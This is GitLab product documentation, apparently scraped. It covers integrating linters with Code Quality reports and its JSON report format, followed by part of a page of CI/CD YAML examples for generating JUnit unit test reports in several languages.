format](#code-quality-report-format) to integrate their results with Code Quality. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name. Other tools can be configured to create JSON output by providing a custom template or format specification. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality. If you already use a tool in your CI/CD pipeline, you should adapt the existing job to add a Code Quality report. Adapting the existing job prevents you from running a separate job that may confuse developers and make your pipelines take longer to run. If you don't already use a tool, you can write a CI/CD job from scratch or adopt the tool by using a component from [the CI/CD Catalog](../components/_index.md#cicd-catalog). ### Code scanning tools #### ESLint If you already have an [ESLint](https://eslint.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add [`eslint-formatter-gitlab`](https://www.npmjs.com/package/eslint-formatter-gitlab) as a development dependency in your project. 1. Add the `--format gitlab` option to the command you use to run ESLint. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `ESLINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`. You can also use or adapt the [ESLint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Stylelint If you already have a [Stylelint](https://stylelint.io/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add [`@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab) as a development dependency in your project. 1. Add the `--custom-formatter=@studiometa/stylelint-formatter-gitlab` option to the command you use to run Stylelint. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `STYLELINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`. For more details and an example CI/CD job definition, see the [documentation for `@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab#usage). #### MyPy If you already have a [MyPy](https://mypy-lang.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Install [`mypy-gitlab-code-quality`](https://pypi.org/project/mypy-gitlab-code-quality/) as a dependency in your project. 1. Change your `mypy` command to send its output to a file. 1. Add a step to your job `script` to reprocess the file into the required format by using `mypy-gitlab-code-quality`. For example: ```yaml - mypy $(find -type f -name "*.py" ! -path "**/.venv/**") --no-error-summary > mypy-out.txt || true # "|| true" is used for preventing job failure when mypy find errors - mypy-gitlab-code-quality < mypy-out.txt > gl-code-quality-report.json ``` 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [MyPy CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Flake8 If you already have a [Flake8](https://flake8.pycqa.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Install [`flake8-gl-codeclimate`](https://github.com/awelzel/flake8-gl-codeclimate) as a dependency in your project. 1. Add the arguments `--format gl-codeclimate --output-file gl-code-quality-report.json` to the command you use to run Flake8. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [Flake8 CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Pylint If you already have a [Pylint](https://pypi.org/project/pylint/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Install [`pylint-gitlab`](https://pypi.org/project/pylint-gitlab/) as a dependency in your project. 1. Add the argument `--output-format=pylint_gitlab.GitlabCodeClimateReporter` to the command you use to run Pylint. 1. Change your `pylint` command to send its output to a file. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [Pylint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Ruff If you already have a [Ruff](https://docs.astral.sh/ruff/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add the argument `--output-format=gitlab` to the command you use to run Ruff. 1. Change your `ruff check` command to send its output to a file. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [documented Ruff GitLab CI/CD integration](https://docs.astral.sh/ruff/integrations/#gitlab-cicd) to run the scan and integrate its output with Code Quality. #### golangci-lint If you already have a [`golangci-lint`](https://golangci-lint.run/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add the arguments to the command you use to run `golangci-lint`. For v1 add `--out-format code-climate:gl-code-quality-report.json,line-number`. For v2 add `--output.code-climate.path=gl-code-quality-report.json`. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [golangci-lint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### PMD Copy/Paste Detector The [PMD Copy/Paste Detector (CPD)](https://pmd.github.io/pmd/pmd_userdocs_cpd.html) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [PMD CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### SwiftLint Using [SwiftLint](https://realm.github.io/SwiftLint/) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [Swiftlint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### RuboCop Using [RuboCop](https://rubocop.org/) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [RuboCop CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Roslynator Using [Roslynator](https://josefpihrt.github.io/docs/roslynator/) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [Roslynator CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. ### Documentation scanning tools You can use Code Quality to scan any file stored in a repository, even if it isn't code. #### Vale If you already have a [Vale](https://vale.sh/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Create a Vale template file in your repository that defines the required format. - You can copy the open source [template used to check GitLab documentation](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/vale-json.tmpl). - You can also use another open source variant like the one used in the community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale/-/blob/main/vale/vale-glcq.tmpl). This community project also provides [a pre-made container image](https://gitlab.com/gitlab-ci-utils/container-images/vale) that includes the same template so you can use it directly in your pipelines. 1. Add the arguments `--output="$VALE_TEMPLATE_PATH" --no-exit` to the command you use to run Vale. 1. Change your `vale` command to send its output to a file. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt an open source job definition to run the scan and integrate its output with Code Quality, for example: - The [Vale linting step](https://gitlab.com/gitlab-org/gitlab/-/blob/94f870b8e4b965a41dd2ad576d50f7eeb271f117/.gitlab/ci/docs.gitlab-ci.yml#L71-87) used to check GitLab documentation. - The community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale#usage). #### markdownlint-cli2 If you already have a [markdownlint-cli2](https://github.com/DavidAnson/markdownlint-cli2) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add [`markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality) as a development dependency in your project. 1. If you don't already have one, create a `.markdownlint-cli2.jsonc` file at the top level of your repository. 1. Add an `outputFormatters` directive to `.markdownlint-cli2.jsonc`: ```json { "outputFormatters": [ [ "markdownlint-cli2-formatter-codequality" ] ] } ``` 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. By default, the report file is named `markdownlint-cli2-codequality.json`. 1. Recommended. Add the report's filename to the repository's `.gitignore` file. For more details and an example CI/CD job definition, see the [documentation for `markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality).
--- stage: Application Security Testing group: Static Analysis info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Code Quality breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Code Quality identifies maintainability issues before they become technical debt. The automated feedback that occurs during code reviews can help your team write better code. The findings appear directly in merge requests, making problems visible when they're most cost-effective to fix. Code Quality works with multiple programming languages and integrates with common linters, style checkers, and complexity analyzers. Your existing tools can feed into the Code Quality workflow, preserving your team's preferences while standardizing how results are displayed. ## Features per tier Different features are available in different [GitLab tiers](https://about.gitlab.com/pricing/), as shown in the following table: | Feature | In Free | In Premium | In Ultimate | |:--------------------------------------------------------------------------------------------|:-------------------------------------|:-------------------------------------|:------------| | [Import Code Quality results from CI/CD jobs](#import-code-quality-results-from-a-cicd-job) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [Use CodeClimate-based scanning](#use-the-built-in-code-quality-cicd-template-deprecated) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in a merge request widget](#merge-request-widget) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in a pipeline report](#pipeline-details-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in the merge request changes view](#merge-request-changes-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | | [Analyze overall health in a project quality summary view](#project-quality-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | ## Scan code for quality violations Code Quality is an open system that supports importing results from many scanning tools. To find violations and surface them, you can: - Directly use a scanning tool and [import its results](#import-code-quality-results-from-a-cicd-job). _(Preferred.)_ - [Use a built-in CI/CD template](#use-the-built-in-code-quality-cicd-template-deprecated) to enable scanning. The template uses the CodeClimate engine, which wraps common open source tools. _(Deprecated.)_ You can capture results from multiple tools in a single pipeline. For example, you can run a code linter to scan your code along with a language linter to scan your documentation, or you can use a standalone tool along with CodeClimate-based scanning. Code Quality combines all of the reports so you see all of them when you [view results](#view-code-quality-results). ### Import Code Quality results from a CI/CD job Many development teams already use linters, style checkers, or other tools in their CI/CD pipelines to automatically detect violations of coding standards. You can make the findings from these tools easier to see and fix by integrating them with Code Quality. To see if your tool already has a documented integration, see [Integrate common tools with Code Quality](#integrate-common-tools-with-code-quality). To integrate a different tool with Code Quality: 1. Add the tool to your CI/CD pipeline. 1. Configure the tool to output a report as a file. - This file must use a [specific JSON format](#code-quality-report-format). - Many tools support this output format natively. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name. - Other tools can sometimes create JSON output using a custom JSON format or template. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that matches this file. Now, after the pipeline runs, the quality tool's results are [processed and displayed](#view-code-quality-results). ### Use the built-in Code Quality CI/CD template (deprecated) {{< alert type="warning" >}} This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](#import-code-quality-results-from-a-cicd-job) instead. {{< /alert >}} Code Quality also includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yaml`. This template runs a scan based on the open source CodeClimate scanning engine. The CodeClimate engine runs: - Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability). - A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code. For more details, see [Configure CodeClimate-based Code Quality scanning](code_quality_codeclimate_scanning.md). #### Migrate from CodeClimate-based scanning The CodeClimate engine uses a customizable set of [analysis plugins](code_quality_codeclimate_scanning.md#configure-codeclimate-analysis-plugins). Some are on by default; others must be explicitly enabled. The following integrations are available to replace the built-in plugins: | Plugin | On by default | Replacement | |--------------|------------------------------------------------------------|-------------| | Duplication | {{< icon name="check-circle" >}} Yes | [Integrate PMD Copy/Paste Detector](#pmd-copypaste-detector). | | ESLint | {{< icon name="check-circle" >}} Yes | [Integrate ESLint](#eslint). | | gofmt | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable the [gofmt linter](https://golangci-lint.run/usage/linters#gofmt). | | golint | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable one of the included linters that replaces golint. golint is [deprecated and frozen](https://github.com/golang/go/issues/38968). | | govet | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint). golangci-lint [includes govet by default](https://golangci-lint.run/usage/linters#enabled-by-default). | | markdownlint | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate markdownlint-cli2](#markdownlint-cli2). | | pep8 | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). | | RuboCop | {{< icon name="dotted-circle" >}} Yes | [Integrate RuboCop](#rubocop). | | SonarPython | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). | | Stylelint | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate Stylelint](#stylelint). | | SwiftLint | {{< icon name="dotted-circle" >}} No | [Integrate SwiftLint](#swiftlint). | ## View Code Quality results Code Quality results are shown in the: - [Merge request widget](#merge-request-widget) - [Merge request changes view](#merge-request-changes-view) - [Pipeline details view](#pipeline-details-view) - [Project quality view](#project-quality-view) ### Merge request widget Code Quality analysis results display in the merge request widget area if a report from the target branch is available for comparison. The merge request widget displays Code Quality findings and resolutions that were introduced by the changes made in the merge request. Multiple Code Quality findings with identical fingerprints display as a single entry in the merge request widget. Each individual finding is available in the full report available in the **Pipeline** details view. ![List of code quality issues in the merge request, ordered by decreasing severity](img/code_quality_merge_request_widget_v18_2.png) ### Merge request changes view {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Code Quality results display in the merge request **Changes** view. Lines containing Code Quality issues are marked by a symbol beside the gutter. Select the symbol to see the list of issues, then select an issue to see its details. ![Lines in a merge request's changes tab marked with a symbol to indicate code quality issues](img/code_quality_changes_view_v18_2.png) ### Pipeline details view {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} The full list of Code Quality violations generated by a pipeline is shown in the **Code Quality** tab of the pipeline's details page. The pipeline details view displays all Code Quality findings that were found on the branch it was run on. ![List of all issues in the branch, ordered by decreasing severity](img/code_quality_pipeline_details_view_v18_2.png) ### Project quality view {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed - Status: Beta {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/72724) in GitLab 14.5 [with a flag](../../administration/feature_flags/_index.md) named `project_quality_summary_page`. This feature is in [beta](../../policy/development_stages_support.md). Disabled by default. {{< /history >}} The project quality view displays an overview of the code quality findings. The view can be found under **Analyze > CI/CD analytics**, and requires [`project_quality_summary_page`](../../administration/feature_flags/_index.md) feature flag to be enabled for this particular project. ![Total number of issues, called violations, followed by the number of issues of each severity](img/code_quality_summary_v15_9.png) ## Code Quality report format You can [import Code Quality results](#import-code-quality-results-from-a-cicd-job) from any tool that can output a report in the following format. This format is a version of the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) that includes a smaller number of fields. The file you provide as [Code Quality report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) must contain a single JSON array. Each object in that array must have at least the following properties: | Name | Type | Description | |-----------------------------------------------------------|---------|-------------| | `description` | String | A human-readable description of the code quality violation. | | `check_name` | String | A unique name representing the check, or rule, associated with this violation. | | `fingerprint` | String | A unique fingerprint to identify this specific code quality violation, such as a hash of its contents. | | `location.path` | String | The file containing the code quality violation, expressed as a relative path in the repository. Do not prefix with `./`. | | `location.lines.begin` or `location.positions.begin.line` | Integer | The line on which the code quality violation occurred. | | `severity` | String | The severity of the violation, can be one of `info`, `minor`, `major`, `critical`, or `blocker`. | The format is different from the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) in the following ways: - Although the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) supports more properties, Code Quality only processes the fields listed previously. - The GitLab parser does not allow a [byte order mark](https://en.wikipedia.org/wiki/Byte_order_mark) at the beginning of the file. For example, this is a compliant report: ```json [ { "description": "'unused' is assigned a value but never used.", "check_name": "no-unused-vars", "fingerprint": "7815696ecbf1c96e6894b779456d330e", "severity": "minor", "location": { "path": "lib/index.js", "lines": { "begin": 42 } } } ] ``` ## Integrate common tools with Code Quality Many tools natively support the required [report format](#code-quality-report-format) to integrate their results with Code Quality. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name. Other tools can be configured to create JSON output by providing a custom template or format specification. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality. If you already use a tool in your CI/CD pipeline, you should adapt the existing job to add a Code Quality report. Adapting the existing job prevents you from running a separate job that may confuse developers and make your pipelines take longer to run. If you don't already use a tool, you can write a CI/CD job from scratch or adopt the tool by using a component from [the CI/CD Catalog](../components/_index.md#cicd-catalog). ### Code scanning tools #### ESLint If you already have an [ESLint](https://eslint.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add [`eslint-formatter-gitlab`](https://www.npmjs.com/package/eslint-formatter-gitlab) as a development dependency in your project. 1. Add the `--format gitlab` option to the command you use to run ESLint. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `ESLINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`. You can also use or adapt the [ESLint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Stylelint If you already have a [Stylelint](https://stylelint.io/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add [`@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab) as a development dependency in your project. 1. Add the `--custom-formatter=@studiometa/stylelint-formatter-gitlab` option to the command you use to run Stylelint. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `STYLELINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`. For more details and an example CI/CD job definition, see the [documentation for `@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab#usage). #### MyPy If you already have a [MyPy](https://mypy-lang.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Install [`mypy-gitlab-code-quality`](https://pypi.org/project/mypy-gitlab-code-quality/) as a dependency in your project. 1. Change your `mypy` command to send its output to a file. 1. Add a step to your job `script` to reprocess the file into the required format by using `mypy-gitlab-code-quality`. For example: ```yaml - mypy $(find -type f -name "*.py" ! -path "**/.venv/**") --no-error-summary > mypy-out.txt || true # "|| true" is used for preventing job failure when mypy find errors - mypy-gitlab-code-quality < mypy-out.txt > gl-code-quality-report.json ``` 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [MyPy CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Flake8 If you already have a [Flake8](https://flake8.pycqa.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Install [`flake8-gl-codeclimate`](https://github.com/awelzel/flake8-gl-codeclimate) as a dependency in your project. 1. Add the arguments `--format gl-codeclimate --output-file gl-code-quality-report.json` to the command you use to run Flake8. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [Flake8 CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Pylint If you already have a [Pylint](https://pypi.org/project/pylint/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Install [`pylint-gitlab`](https://pypi.org/project/pylint-gitlab/) as a dependency in your project. 1. Add the argument `--output-format=pylint_gitlab.GitlabCodeClimateReporter` to the command you use to run Pylint. 1. Change your `pylint` command to send its output to a file. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [Pylint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Ruff If you already have a [Ruff](https://docs.astral.sh/ruff/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add the argument `--output-format=gitlab` to the command you use to run Ruff. 1. Change your `ruff check` command to send its output to a file. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [documented Ruff GitLab CI/CD integration](https://docs.astral.sh/ruff/integrations/#gitlab-cicd) to run the scan and integrate its output with Code Quality. #### golangci-lint If you already have a [`golangci-lint`](https://golangci-lint.run/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add the arguments to the command you use to run `golangci-lint`. For v1 add `--out-format code-climate:gl-code-quality-report.json,line-number`. For v2 add `--output.code-climate.path=gl-code-quality-report.json`. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt the [golangci-lint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### PMD Copy/Paste Detector The [PMD Copy/Paste Detector (CPD)](https://pmd.github.io/pmd/pmd_userdocs_cpd.html) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [PMD CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### SwiftLint Using [SwiftLint](https://realm.github.io/SwiftLint/) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [Swiftlint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### RuboCop Using [RuboCop](https://rubocop.org/) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [RuboCop CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. #### Roslynator Using [Roslynator](https://josefpihrt.github.io/docs/roslynator/) requires additional configuration because its default output doesn't conform to the required format. You can use or adapt the [Roslynator CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality. ### Documentation scanning tools You can use Code Quality to scan any file stored in a repository, even if it isn't code. #### Vale If you already have a [Vale](https://vale.sh/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Create a Vale template file in your repository that defines the required format. - You can copy the open source [template used to check GitLab documentation](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/vale-json.tmpl). - You can also use another open source variant like the one used in the community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale/-/blob/main/vale/vale-glcq.tmpl). This community project also provides [a pre-made container image](https://gitlab.com/gitlab-ci-utils/container-images/vale) that includes the same template so you can use it directly in your pipelines. 1. Add the arguments `--output="$VALE_TEMPLATE_PATH" --no-exit` to the command you use to run Vale. 1. Change your `vale` command to send its output to a file. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. You can also use or adapt an open source job definition to run the scan and integrate its output with Code Quality, for example: - The [Vale linting step](https://gitlab.com/gitlab-org/gitlab/-/blob/94f870b8e4b965a41dd2ad576d50f7eeb271f117/.gitlab/ci/docs.gitlab-ci.yml#L71-87) used to check GitLab documentation. - The community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale#usage). #### markdownlint-cli2 If you already have a [markdownlint-cli2](https://github.com/DavidAnson/markdownlint-cli2) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output: 1. Add [`markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality) as a development dependency in your project. 1. If you don't already have one, create a `.markdownlint-cli2.jsonc` file at the top level of your repository. 1. Add an `outputFormatters` directive to `.markdownlint-cli2.jsonc`: ```json { "outputFormatters": [ [ "markdownlint-cli2-formatter-codequality" ] ] } ``` 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. By default, the report file is named `markdownlint-cli2-codequality.json`. 1. Recommended. Add the report's filename to the repository's `.gitignore` file. For more details and an example CI/CD job definition, see the [documentation for `markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality).
https://docs.gitlab.com/ci/unit_test_report_examples
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/unit_test_report_examples.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
unit_test_report_examples.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Unit test report examples
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [Unit test reports](unit_test_reports.md) can be generated for many languages and packages. Use these examples as guidelines for configuring your pipeline to generate unit test reports for the listed languages and packages. You might need to edit the examples to match the version of the language or package you are using. ## Ruby Use the following job in `.gitlab-ci.yml`. This includes the `artifacts:paths` keyword to provide a link to the Unit test report output file. ```yaml ## Use https://github.com/sj26/rspec_junit_formatter to generate a JUnit report format XML file with rspec ruby: image: ruby:3.0.4 stage: test before_script: - apt-get update -y && apt-get install -y bundler script: - bundle install - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml artifacts: when: always paths: - rspec.xml reports: junit: rspec.xml ``` ## Go Use the following job in `.gitlab-ci.yml`: ```yaml ## Use https://github.com/gotestyourself/gotestsum to generate a JUnit report format XML file with go golang: stage: test script: - go install gotest.tools/gotestsum@latest - gotestsum --junitfile report.xml --format testname artifacts: when: always reports: junit: report.xml ``` ## Java There are a few tools that can produce JUnit report format XML file in Java. ### Gradle In the following example, `gradle` is used to generate the test reports. If there are multiple test tasks defined, `gradle` generates multiple directories under `build/test-results/`. In that case, you can leverage glob matching by defining the following path: `build/test-results/test/**/TEST-*.xml`: ```yaml java: stage: test script: - gradle test artifacts: when: always reports: junit: build/test-results/test/**/TEST-*.xml ``` ### Maven For parsing [Surefire](https://maven.apache.org/surefire/maven-surefire-plugin/) and [Failsafe](https://maven.apache.org/surefire/maven-failsafe-plugin/) test reports, use the following job in `.gitlab-ci.yml`: ```yaml java: stage: test script: - mvn verify artifacts: when: always reports: junit: - target/surefire-reports/TEST-*.xml - target/failsafe-reports/TEST-*.xml ``` ## Python example This example uses pytest with the `--junitxml=report.xml` flag to format the output into the JUnit report XML format: ```yaml pytest: stage: test script: - pytest --junitxml=report.xml artifacts: when: always reports: junit: report.xml ``` ## C/C++ There are a few tools that can produce JUnit report format XML files in C/C++. ### GoogleTest In the following example, `gtest` is used to generate the test reports. If there are multiple `gtest` executables created for different architectures (`x86`, `x64` or `arm`), you are required to run each test providing a unique filename. The results are then aggregated together. ```yaml cpp: stage: test script: - gtest.exe --gtest_output="xml:report.xml" artifacts: when: always reports: junit: report.xml ``` ### CUnit [CUnit](https://cunity.gitlab.io/cunit/) can be made to produce [JUnit report format XML files](https://cunity.gitlab.io/cunit/group__CI.html) automatically when run using its `CUnitCI.h` macros: ```yaml cunit: stage: test script: - ./my-cunit-test artifacts: when: always reports: junit: ./my-cunit-test.xml ``` ## .NET The [JunitXML.TestLogger](https://www.nuget.org/packages/JunitXml.TestLogger/) NuGet package can generate test reports for .Net Framework and .Net Core applications. The following example expects a solution in the root folder of the repository, with one or more project files in sub-folders. One result file is produced per test project, and each file is placed in the artifacts folder. This example includes optional formatting arguments, which improve the readability of test data in the test widget. A full .Net Core [example is 